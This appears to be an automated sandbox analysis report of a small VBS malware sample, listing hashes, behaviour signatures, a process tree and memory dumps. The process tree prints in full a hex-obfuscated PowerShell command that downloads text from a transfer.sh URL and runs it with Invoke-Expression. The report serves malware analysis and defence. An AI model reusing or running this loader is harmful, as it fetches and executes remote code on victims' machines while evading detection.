Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    27/01/2024, 15:02

General

  • Target

    7a8e3b2ff5ccd38e51738cb91d4e0dfd.vbs

  • Size

    3KB

  • MD5

    7a8e3b2ff5ccd38e51738cb91d4e0dfd

  • SHA1

    69a2689ec49a1b9481974e212eb6dda04da949c7

  • SHA256

    89646c9bfbb4edf70e0d2b0244e41b65bbdbf718db5e0a8bd9adb192541e6354

  • SHA512

    d9e68df88259b3e8bf093d64a1045c3b1c138987be374e0d0c0d3f2cdc55397fd1b76a9608112acf3abdfcfb1468d4019d9570de7addcd9c728813f9f436b5d7

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7a8e3b2ff5ccd38e51738cb91d4e0dfd.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SOS='2@-H-53-H-5A-H-58-H-@@-H-@3-H-@6-H-56-H-@7-H-@2-H-@8-H-@E-H-@A-H-53-H-@@-H-@6-H-@7-H-@8-H-20-H-3D-H-20-H-27-H-68-H-7@-H-7@-H-70-H-3A-H-2F-H-2F-H-7@-H-72-H-61-H-6E-H-73-H-66-H-65-H-72-H-2E-H-73-H-68-H-2F-H-67-H-65-H-7@-H-2F-H-59-H-@2-H-6A-H-76-H-39-H-6E-H-2F-H-@A-H-@B-H-6@-H-2E-H-7@-H-78-H-7@-H-27-H-3B-H-0D-H-0A-H-2@-H-@5-H-@@-H-52-H-@6-H-@7-H-@8-H-@E-H-@A-H-@D-H-@B-H-@@-H-@5-H-@6-H-@7-H-@8-H-@A-H-20-H-3D-H-20-H-27-H-6E-H-@5-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-@5-H-62-H-@3-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-5@-H-27-H-2E-H-52-H-65-H-70-H-6C-H-61-H-63-H-65-H-28-H-27-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-27-H-2C-H-27-H-7@-H-2E-H-57-H-27-H-29-H-2E-H-52-H-65-H-70-H-6C-H-61-H-63-H-65-H-28-H-27-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-27-H-2C-H-27-H-6C-H-@9-H-@5-H-@E-H-27-H-29-H-3B-H-0D-H-0A-H-2@-H-53-H-58-H-@@-H-@3-H-@6-H-56-H-@7-H-@2-H-@8-H-@E-H-@A-H-58-H-@@-H-@3-H-@6-H-56-H-@7-H-@2-H-@8-H-@A-H-@B-H-20-H-3D-H-20-H-27-H-@@-H-@F-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-61-H-@@-H-53-H-5@-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-@7-H-27-H-2E-H-52-H-65-H-70-H-6C-H-61-H-63-H-65-H-28-H-27-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-2A-H-27-H-2C-H-27-H-57-H-6E-H-@C-H-6F-H-27-H-29-H-2E-H-52-H-65-H-70-H-6C-H-61-H-63-H-65-H-28-H-27-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-27-H-2C-H-27-H-72-H-@9-H-6E-H-27-H-29-H-3B-H-0D-H-0A-H-2@-H-53-H-57-H-58-H-@@-H-@5-H-@3-H-52-H-@6-H-@7-H-59-H-@8-H-55-H-@A-H-@9-H-53-H-@@-H-@6-H-56-H-@7-H-@8-H-@A-H-20-H-3D-H-27-H-@9-H-60-H-@5-H-58-H-28-H-6E-H-60-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-60-H-63-H-60-H-5@-H-20-H-2@-H-@5-H-@@-H-52-H-@6-H-@7-H-@8-H-@E-H-@A-H-@D-H-@B-H-@@-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-@7-H-@2-H-@8-H-@E-H-@A-H-53-H-@@-H-@6-H-@7-H-@8-H-29-H-27-H-2E-H-52-H-65-H-70-H-6C-H-61-H-63-H-65-H-28-H-27-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-27-H-2C-H-27-H-65-H-60-H-57-H-60-H-2D-H-@F-H-62-H-6A-H-60-H-@5-H-27-H-29-H-2E-H-52-H-65-H-70-H-6C-H-61-H-63-H-65-H-28-H-27-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3C-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-3E-H-27-H-2C-H-27-H-@5-H-@6-H-@7-H-@8-H-@A-H-29-H-2E-H-2@-H-53-H-58-H-@@-H-@3-H-@6-H-56-H-@7-H-@2-H-@8-H-@E-H-@A-H-58-H-@@-H-@3-H-@6-H-56-H-@7-H-@2-H-@8-H-@A-H-@B-H-28-H-2@-H-53-H-5A-H-58-H-@@-H-@3-H-@6-H-56-H-27-H-29-H-3B-H-0D-H-0A-H-26-H-28-H-27-H-@9-H-27-H-2B-H-27-H-@5-H-58-H-27-H-29-H-28-H-2@-H-53-H-57-H-58-H-@@-H-@5-H-@3-H-52-H-@6-H-@7-H-59-H-@8-H-55-H-@A-H-@9-H-53-H-@@-H-@6-H-56-H-@7-H-@8-H-@A-H-20-H-2D-H-@A-H-6F-H-69-H-6E-H-20-H-27-H-27-H-29-H-7C-H-26-H-28-H-27-H-@9-H-27-H-2B-H-27-H-@5-H-58-H-27-H-29-H-3B-H-'.Replace('@','4');Invoke-Expression (-join ($SOS -split '-H-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2364

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2364-4-0x000000001B540000-0x000000001B822000-memory.dmp

    Filesize

    2.9MB

  • memory/2364-5-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

    Filesize

    32KB

  • memory/2364-6-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2364-8-0x0000000002980000-0x0000000002A00000-memory.dmp

    Filesize

    512KB

  • memory/2364-9-0x0000000002980000-0x0000000002A00000-memory.dmp

    Filesize

    512KB

  • memory/2364-7-0x0000000002980000-0x0000000002A00000-memory.dmp

    Filesize

    512KB

  • memory/2364-10-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2364-11-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

    Filesize

    9.6MB